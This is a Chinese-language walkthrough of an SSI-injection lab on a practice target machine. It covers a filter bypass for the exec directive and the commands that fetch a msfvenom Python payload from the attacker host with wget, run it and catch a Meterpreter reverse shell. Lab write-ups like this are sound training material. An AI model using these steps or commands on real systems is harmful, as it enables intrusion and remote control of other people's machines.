web靶机系列-ssi漏洞

主机：192.168.136.133
靶机：192.168.136.138
先用nmap、nikto扫一波发现存在漏洞

登陆网址，打开robots链接，发现反爬目录/spukcab


接着在扫描得到的两个index文件，一个一个打开。发现有它给出的漏洞执行代码，我们去利用它

接下来打开主页面，在登陆哪里发现可注入点

将给出的代码复制进去


发现代码中exec被过滤，试将大写看看能不能绕过

绕过但是却没有执行，可能是格式有误，我们加一个！号。


发现成功，代码被执行
接下来制作shell，利用漏洞上传shell脚本反弹shell。使用msfvenom制作shell.py。
https://www.jianshu.com/p/dee2b171a0a0的msfvenom基本使用

将shell.py移到apache的主目录。即/var/www/html下。

打开apache服务

开启 metasploit

利用exploit/multi/handler板块开启监听

模块下payload python/meterpreter/reverse_tcp

设置返回地址为主机地址并run

返回注入页面，下载shell.py文件
wget http://192.168.136.133 /shell.py

给文件shell提权
chmod 777 shell.py

执行shell.py文件，返回shell。
python shell.py

回到终端，可以看到反弹shell成功。

进入shell

进行shell页面优化，python -c “import pty;pty.spawn(’/bin/bash’)” （简单的shell转换成为完全交互式的tty）